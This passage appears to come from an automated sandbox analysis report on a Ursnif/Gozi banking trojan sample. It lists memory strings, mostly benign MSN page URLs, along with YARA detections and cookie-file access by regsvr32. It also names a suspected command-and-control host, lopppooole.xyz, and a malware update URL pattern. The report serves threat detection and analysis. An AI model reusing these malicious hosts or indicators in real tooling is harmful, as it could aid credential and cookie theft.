Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: regsvr32.exe, powershell.exe, 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, powershell.exe, 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000001F.00000003.541958735.000002BCC5665000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000001F.00000003.542147302.000002BCC56CD000.00000004.00000001.sdmp	String found in binary or memory: http://crl.m
Source: regsvr32.exe, 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, powershell.exe, 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: imagestore.dat.26.dr	String found in binary or memory: http://lopppooole.xyz/favicon.ico
Source: imagestore.dat.26.dr, imagestore.dat.3.dr	String found in binary or memory: http://lopppooole.xyz/favicon.ico~
Source: {BA4D6CF6-5A92-11EB-90E4-ECF4BB862DED}.dat.3.dr	String found in binary or memory: http://lopppooole.xyz/manifest/DGnwMOevMC4C/FwTBVjFVT7Q/om1iea6xc3SLTm/LhexSznuxAV0l1eIdd7aN/EYbCXiw
Source: ~DFAFFED478F38F39DF.TMP.3.dr, {BA4D6CF4-5A92-11EB-90E4-ECF4BB862DED}.dat.3.dr	String found in binary or memory: http://lopppooole.xyz/manifest/QNYwAwEGA6Nk/oqkcQpDHt62/AROwNcnS85Yj6H/Kiw419AbdChBoBC1YflBI/btAWmao
Source: ~DFFEA6D319A9C13887.TMP.3.dr, {BA4D6CF8-5A92-11EB-90E4-ECF4BB862DED}.dat.3.dr	String found in binary or memory: http://lopppooole.xyz/manifest/kCTdQ_2BVGuRh3/WFBmy05TUuAn4xtP9_2FP/3n_2FnxuIWQ3b206/ecbDlimfQBclFip
Source: powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.4.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: powershell.exe, 0000001F.00000002.563269063.000002BCAD4E0000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: auction[1].htm.4.dr	String found in binary or memory: http://popup.taboola.com/german
Source: powershell.exe, 0000001F.00000002.562212430.000002BCAD2D1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ~DF24569624759CC30D.TMP.3.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: msapplication.xml.3.dr	String found in binary or memory: http://www.amazon.com/
Source: powershell.exe, 0000001F.00000002.563269063.000002BCAD4E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msapplication.xml1.3.dr	String found in binary or memory: http://www.google.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.3.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.3.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.3.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.3.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.3.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.3.dr	String found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.4.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://bealion.com/politica-de-cookies
Source: auction[1].htm.4.dr	String found in binary or memory: https://beap.gemini.yahoo.com/action?bv=1.0.0&es=fh6wC_gGIS.10f2hn6DNm4WjTpq0zHdzzquo1zLbbfODSiK
Source: auction[1].htm.4.dr	String found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&es=fSyMbMQGIS.FowJX5RT8A4RXR8O8RqsK3BZB74OFVi4xfMs.
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: auction[1].htm.4.dr	String found in binary or memory: https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://channelpilot.co.uk/privacy-policy
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de
Source: ~DF24569624759CC30D.TMP.3.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: ~DF24569624759CC30D.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ~DF24569624759CC30D.TMP.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://docs.prebid.org/privacy.html
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: powershell.exe, 0000001F.00000002.563269063.000002BCAD4E0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: auction[1].htm.4.dr	String found in binary or memory: https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&es=lwPv9W0GIS_qyQvCpzJTy3EGufaBHjdqJd8SOiFJsdj7
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg"
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://listonic.com/privacy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1611054661&rver
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1611054661&rver=7.0.6730.0&am
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1611054662&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1611054661&rver=7.0.6730.0&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: auction[1].htm.4.dr	String found in binary or memory: https://policies.oath.com/us/en/oath/privacy/index.html
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://quantyoo.de/datenschutz
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://related.hu/adatkezeles/
Source: ~DF24569624759CC30D.TMP.3.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862
Source: auction[1].htm.4.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/.UiDyEjfgZbPhaApSjF6RQ--~A/Zmk9ZmlsbDt3PTIwNztoPTI0MTthcHBpZD1nZW1
Source: auction[1].htm.4.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/9FkxQzh8n2OLcwPo6n5irg--~A/Zmk9ZmlsbDt3PTIwNztoPTI0MTthcHBpZD1nZW1
Source: auction[1].htm.4.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/AlAilqKi7W35LtcnI7DHWQ--~A/Zmk9ZmlsbDt3PTIwNztoPTI0MTthcHBpZD1nZW1
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: auction[1].htm.4.dr	String found in binary or memory: https://srtb.msn.com:443/notify/viewedg?rid=f16406a7b26f4c8ba0192b5d2df01324&r=infopane&i=3&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.4.dr, imagestore.dat.3.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cSLsD.img?h=368&amp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.admo.tv/en/privacy-policy
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.brightcom.com/privacy-policy/
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.gadsme.com/privacy-policy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DF24569624759CC30D.TMP.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/ab-freitag-sind-wir-eine-papeterie-die-z%c3%bcrcher-gewerbler-b
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/bei-den-steuern-brauchts-jetzt-keine-unterschrift-mehr/ar-BB1cS
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/damit-im-homeoffice-nicht-wieder-der-r%c3%bccken-schmerzt/ar-BB
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/das-ansteckungsrisiko-beim-coronavirus-sei-zu-gross-die-zhaw-ve
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/der-z%c3%bcrcher-kantonsrat-h%c3%a4lt-nichts-davon-mehr-geld-f%
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/drecksarbeit-gemacht-mann-stiftet-14-j%c3%a4hrigen-zu-raub%c3%b
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/ernst-stocker-gibt-gas/ar-BB1cRDLV?ocid=hplocalnews
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/j%c3%bcdisches-online-treffen-mit-hitler-und-porno-bildern-gest
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/streit-um-lohnerh%c3%b6hung-f%c3%bcr-den-z%c3%bcrcher-kantonsra
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/uhren-und-schmuck-im-wert-von-%c3%bcber-260-000-franken-geklaut
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.remixd.com/privacy_policy.html
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.3:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49740 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.474076066.0000000004C1C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421520265.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421722913.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421588649.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.559791102.0000000000CC6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421746535.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421559513.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421467795.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421622681.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421656779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7068, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6348, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6660, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	1_2_04A0CB16
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	1_2_04A0CB16
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	1_2_04A0CB16
